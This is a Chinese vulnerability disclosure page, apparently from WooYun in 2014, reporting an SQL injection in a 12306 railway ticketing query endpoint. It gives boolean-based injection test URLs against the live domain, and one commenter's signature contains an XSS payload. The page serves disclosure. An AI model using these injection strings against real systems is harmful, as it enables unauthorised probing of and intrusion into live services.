漏洞概要
关注数(24)
关注此漏洞
漏洞标题:12306某接口存在SQL注射漏洞(能奖张回家的车票吗)
提交时间:2014-01-10 14:47
修复时间:2014-01-15 14:48
公开时间:2014-01-15 14:48
漏洞类型:SQL注射漏洞
危害等级:低
自评Rank:1
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2014-01-10: 细节已通知厂商并且等待厂商处理中
2014-01-15: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
过年回家想买张票都难,提交一个最简单的sql注射漏洞,没什么技术含量,只求能帮忙订到一张回家的车票。
详细说明:
url如下:
https://kyfw.12306.cn/otn/zwdch/queryCC?train_station_code=SHH
http 和 https均可,参数提交方式可以是get 也可以是post.
漏洞证明:
漏洞证明
https://kyfw.12306.cn/otn/zwdch/queryCC?train_station_code=SHH' and 1=1 and 'a'='a
https://kyfw.12306.cn/otn/zwdch/queryCC?train_station_code=SHH' and 1=2 and 'a'='a
修复方案:
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-01-15 14:48
厂商回复:
最新状态:
暂无
漏洞评价:
评论
-
2014-01-10 15:06 |
洗剪吹 ( 路人 | Rank:1 漏洞数:1 | 出门在外,安全第一!)
-
2014-01-10 15:07 |
Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)
-
2014-01-10 15:09 |
阿峰 ( 实习白帽子 | Rank:39 漏洞数:9 | 关注网络安全,人人有责。)
-
2014-01-10 15:26 |
Bloodwolf ( 实习白帽子 | Rank:47 漏洞数:8 | whoami)
-
2014-01-10 15:33 |
袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)
-
2014-01-10 15:45 |
雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)
-
2014-01-10 16:20 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2014-01-10 16:32 |
sampro ( 路人 | Rank:12 漏洞数:1 | Hello World)
-
2014-01-10 16:40 |
niliu ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)
-
2014-01-10 17:28 |
Enjoy_Hacking ( 实习白帽子 | Rank:84 漏洞数:8 | 时间无言,如此这般。)
-
2014-01-10 17:36 |
debbbbie ( 路人 | Rank:10 漏洞数:2 | 深藏功与名 - A Rubyist)
-
2014-01-10 22:06 |
M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)
-
2014-01-11 01:12 |
小菜鸟 ( 路人 | Rank:1 漏洞数:1 | )
-
2014-01-11 09:46 |
烈酒香烟 ( 路人 | Rank:3 漏洞数:1 )
能帮忙加两个票吗,带座的,正月初二的,上海到池州的火车T777
-
2014-01-11 10:06 |
霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了,刷分还是不刷?)
-
2014-01-11 10:18 |
B1acken ( 普通白帽子 | Rank:174 漏洞数:56 | 渣渣)
-
2014-01-11 11:48 |
袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)
-
2014-01-11 14:07 |
do9gy ( 实习白帽子 | Rank:61 漏洞数:15 | Dog loves God。)
-
2014-01-11 14:34 |
nothin ( 路人 | Rank:0 漏洞数:1 | 路过)
-
2014-01-11 15:42 |
点点 ( 普通白帽子 | Rank:214 漏洞数:38 | 准备申请سمَـَّوُوُحخ ̷̴̐...)
-
2014-01-13 16:52 |
sweetsay ( 路人 | Rank:0 漏洞数:1 | 为了学习而努力~~)
-
2014-01-15 14:51 |
Stranger ( 路人 | Rank:0 漏洞数:1 | 我注意你很久了.....)
-
2014-01-15 14:52 |
px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)
-
2014-01-15 15:21 |
风的传奇 ( 路人 | Rank:1 漏洞数:2 | 没有什么了不起,混迹于茫茫网络而已。)
-
2014-01-15 16:30 |
Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)
-
2014-01-15 17:07 |
xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)
-
2014-01-15 17:07 |
xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)
-
2014-01-15 17:46 |
gm100861 ( 路人 | Rank:1 漏洞数:2 | http://www.gm100861.com/)
-
-
2014-01-15 21:58 |
ahnhhh ( 路人 | Rank:5 漏洞数:1 | 你在乌云这么吊,你家人知道么?)
-
2014-01-15 22:50 |
雅柏菲卡 ( 普通白帽子 | Rank:1213 漏洞数:234 | 雙魚座聖鬥士雅柏菲卡)
-
2014-01-16 05:27 |
Jany ( 路人 | Rank:0 漏洞数:1 | 宅女一枚。。很宅的宅女。)
-
2014-01-16 08:06 |
Nanka ( 路人 | Rank:10 漏洞数:2 | 已死去的大爷)
-
-
2014-02-03 19:24 |
Windy ( 路人 | Rank:26 漏洞数:10 | 苦逼的民工)